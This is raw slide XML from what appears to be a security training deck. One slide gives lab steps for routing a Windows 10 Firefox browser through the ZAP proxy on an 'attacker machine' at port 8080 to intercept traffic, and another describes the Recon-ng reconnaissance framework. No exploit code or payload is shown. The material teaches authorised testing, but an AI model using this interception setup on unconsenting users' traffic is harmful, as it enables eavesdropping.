            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1556" name="Google Shape;1556;p223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1557" name="Google Shape;1557;p223" descr="C:\Users\Dell\Downloads\zap-qstart-manualexplore.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757990" y="1335505"/>
            <a:ext cx="7634037" cy="3275597"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1562" name="Google Shape;1562;p224"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1563" name="Google Shape;1563;p224"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279735" y="1173079"/>
            <a:ext cx="8721300" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>   Lets us see steps on how  to use the zap tool and how to setup it.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Intercept the Traffic between server and client</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Setup the Proxy</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Log into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Windows 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> and launch any browser, in this lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Network Settings</a:t>
            </a:r>
            <a:endParaRPr sz="1800" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Proxy Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>, check the box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Manual Proxy Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>, and type the Attacker machine's IP address on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1564" name="Google Shape;1564;p224"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1569" name="Google Shape;1569;p225"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1570" name="Google Shape;1570;p225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282869" y="709642"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1571" name="Google Shape;1571;p225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074123" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2700" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1572" name="Google Shape;1572;p225" descr="C:\Users\Dell\Downloads\zap-0.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449368" y="1100890"/>
            <a:ext cx="5742508" cy="37628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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p53"/>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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Recon-ng is a full-featured Web Reconnaissance framework written in Python. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>However, it is quite different. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, use the Social Engineer Toolkit.</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Google Shape;1577;p226"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3230741" y="120515"/>
            <a:ext cx="2121000" cy="417300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1578" name="Google Shape;1578;p226"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
